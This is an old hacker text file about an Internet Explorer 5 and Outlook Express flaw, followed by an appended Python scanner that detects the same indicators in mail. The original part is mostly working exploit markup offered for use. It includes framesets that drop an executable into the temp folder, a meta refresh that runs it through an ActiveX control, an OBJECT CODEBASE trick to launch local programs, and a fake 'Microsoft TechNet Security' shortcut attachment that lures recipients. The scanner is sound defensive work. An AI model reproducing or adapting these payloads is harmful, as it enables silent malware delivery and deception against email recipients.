Intro
~~~~~

Internet Explorer 5, and the mail and news clients which come with it (on Win95/98/2K), are very strange in that they choose to ignore user input. More specifically, this allows us to manually force a file onto the target computer, despite all prompts and warnings.

How can this be done?
~~~~~~~~~~~~~~~~~~~~~

We begin by creating a simple HTML FrameSet and embed, in base64, our file:

<frameset rows="10%,*">
<frame src="mars.exe">
</frameset>

What happens?
~~~~~~~~~~~~~

What we do now is create a very simple HTML Mail or News file and send it to the target computer. When they receive this file and open it, the recipient will be prompted as to whether they would like to "save", "open" or "cancel". None of these really work. Whichever one the recipient chooses, the file is injected into the temp folder. Selecting any of the three choices is completely useless: the file is still delivered to the temp folder. Even if their system's "Security Zone" is set to DISABLE, they just get a slightly different prompt which only allows you to press OK, and this is, once again, useless. No matter what, the file is delivered into the temp folder.

So? What next?
~~~~~~~~~~~~~~

Well, next create a second file which contains a new ActiveX control:

(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A)

which allows us to execute files locally. We embed the simple JavaScript that runs this, together with the ActiveX control, in base64, and embed that in a second HTML frame:

<frameset rows="10%,*">
<frame src="mars.exe" >
<frame src="lunar.mhtml" >
</frameset>

Then we apply the VERY simple HTTP-EQUIV meta tag of refresh:

<meta http-equiv="refresh" content="5; url=mhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">

and repack again in base64.

What are the results?
~~~~~~~~~~~~~~~~~~~~~

The first file deposits the *.exe and the second *.mhtml file into the temp directory. The client will be asked whether to save, open, or cancel. No matter what choice they make, these files will be deposited as soon as the prompt has been closed. The meta refresh will bounce to the *.mhtml in the temp dir, open it, execute the JavaScript and ActiveX control and run the *.exe. None of the Security Zone settings will prevent this because we are working locally from the temp directory.

Now you want to do this over e-mail?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Of course it can be done! You have a greater chance of failing though. Create two sets of HTML messages.

The first comprises the file to be delivered:

<frameset rows="10%,*">
<frame src="refresh.bat" >
</frameset>

Note: to be executed from the mail client. A simple *.bat containing @exit.

The second comprises a fraudulent, manufactured *.url:

Content-Type: application/octet-stream; name="Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=C:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=C:\WINDOWS\TEMP\refresh.bat

We include a fake link:

<font color=blue style="cursor:hand">....

The recipient will then be forced to entertain the fraudulent *.url.

--

You can get any local .exe to execute in IE by referring to it in the CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything but all zeros. Here is a code snippet, courtesy of Dildog, which will execute calc.exe if it is in c:\windows\system32\:

<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' CODEBASE='c:\windows\system32\calc.exe'></OBJECT>
</BODY></HTML>

The other problem is the fact that .exe files can get downloaded to your local system without you being able to cancel the operation. I tested the malware exploit on Win98 with medium security settings (the default) and it worked as promised. But what was far worse was that it worked at the high security setting also. A warning message came up saying "Due to your security settings you cannot download that file." You press OK and the file is downloaded anyway. Then it executes when used as the codebase of an ActiveX control.

The demo exploit won't work in W2K because the temp directory where the .exe is downloaded to is "c:\documents and settings\'username'\local settings\temp". If it were possible to get the username through JavaScript and another ActiveX control it could possibly be made to work there also.

I hope you enjoyed this file and find it useful. It's early in the morning/late at night so I'm kinda burnt. The Non-Existent Crew rocks! We're proud to be Canadian eh!

--
PsychoSpy
PsychoSpy@HushMail.Com
ICQ#: 5057653
07.16.00
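Every step of the write-up leaves a recognisable trace in the mail body before anything reaches the temp directory: a <frame src> that names an executable, a meta refresh whose url= resolves to mhtml:file:// or a drive path, an <OBJECT> whose CODEBASE is a local path, and a *.url attachment whose URL=/BASEURL= lines point at C:\. The scanner below is an added example, not part of the original file or anyone's tool from that era; it uses only the Python standard library, and all sample inputs are constructed from the snippets above (the "benign" frameset and the http:// refresh are invented controls to show what is not flagged). It covers both the frameset/meta-refresh technique and the CODEBASE/*.url variants in one pass, so a mail gateway or forensic triage script could run scan_message over a raw message and act on the (indicator, value) pairs it returns.

```python
"""Scan HTML/MHTML mail content for the IE5 forced-download-and-run indicators
described above.  Added example, not part of the original text: it uses only the
Python standard library, and every sample input below is constructed from the
snippets in the write-up, not captured from real mail."""
import email
import re
from html.parser import HTMLParser

# Extensions the write-up shows being dropped into %TEMP% via <frame src=...>.
DROPPED_EXTENSIONS = (".exe", ".bat", ".mhtml", ".url")

# A reference that resolves to the local filesystem: "file:", a drive letter,
# or the "mhtml:file://" wrapper used in the meta refresh above.
LOCAL_PATH_RE = re.compile(r"^(?:mhtml:)?(?:file:|[a-z]:[\\/])", re.IGNORECASE)


class LocalExecScanner(HTMLParser):
    """Collect (indicator, value) pairs while parsing one HTML part."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}  # HTMLParser lowercases names
        if tag == "frame" and a.get("src", "").lower().endswith(DROPPED_EXTENSIONS):
            self.findings.append(("frame-drops-file", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.IGNORECASE)
            if m and LOCAL_PATH_RE.match(m.group(1)):
                self.findings.append(("refresh-to-local-file", m.group(1)))
        elif tag == "object" and LOCAL_PATH_RE.match(a.get("codebase", "")):
            self.findings.append(("object-codebase-local", a["codebase"]))


def scan_html(html):
    """Return the indicators found in one HTML document."""
    parser = LocalExecScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_url_shortcut(text):
    """Flag a *.url (InternetShortcut) whose URL= or BASEURL= targets a local path."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().upper() in ("URL", "BASEURL") and LOCAL_PATH_RE.match(value.strip()):
            hits.append(("shortcut-to-local-file", value.strip()))
    return hits


def scan_message(raw):
    """Walk a MIME message: HTML parts go to scan_html, *.url attachments to scan_url_shortcut."""
    findings = []
    for part in email.message_from_string(raw).walk():
        payload = part.get_payload(decode=True)
        if payload is None:  # multipart container, nothing to scan
            continue
        text = payload.decode("latin-1", errors="replace")
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(text))
        elif (part.get_filename() or "").lower().endswith(".url"):
            findings.extend(scan_url_shortcut(text))
    return findings


# Constructed samples modelled on the snippets in the write-up.
SAMPLE_FRAMESET = '<frameset rows="10%,*"><frame src="mars.exe"><frame src="lunar.mhtml"></frameset>'
SAMPLE_REFRESH = '<meta http-equiv="refresh" content="5; url=mhtml:file://C:\\WINDOWS\\TEMP\\lunar.mhtml">'
SAMPLE_OBJECT = ("<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' "
                 "CODEBASE='c:\\windows\\system32\\calc.exe'></OBJECT>")
BENIGN_HTML = ('<frameset rows="10%,*"><frame src="nav.html"><frame src="http://example.com/main.html">'
               '</frameset><meta http-equiv="refresh" content="5; url=http://example.com/">')
SAMPLE_MESSAGE = """\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<frameset rows="10%,*"><frame src="refresh.bat"></frameset>
--b1
Content-Type: application/octet-stream; name="Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=C:\\WINDOWS\\TEMP\\refresh.bat
[InternetShortcut]
URL=C:\\WINDOWS\\TEMP\\refresh.bat
--b1--
"""

if __name__ == "__main__":
    for label, result in [("frameset", scan_html(SAMPLE_FRAMESET)),
                          ("refresh", scan_html(SAMPLE_REFRESH)),
                          ("object", scan_html(SAMPLE_OBJECT)),
                          ("benign", scan_html(BENIGN_HTML)),
                          ("message", scan_message(SAMPLE_MESSAGE))]:
        print(label, result)
```

The matching is deliberately on where a reference resolves (local filesystem) rather than on specific filenames or the CLSIDs quoted above, since the write-up itself notes the CLASSID can be anything but all zeros; a real gateway would also want to unwrap base64-encoded parts before feeding them to scan_html, which email.message_from_string already does for a properly labelled Content-Transfer-Encoding.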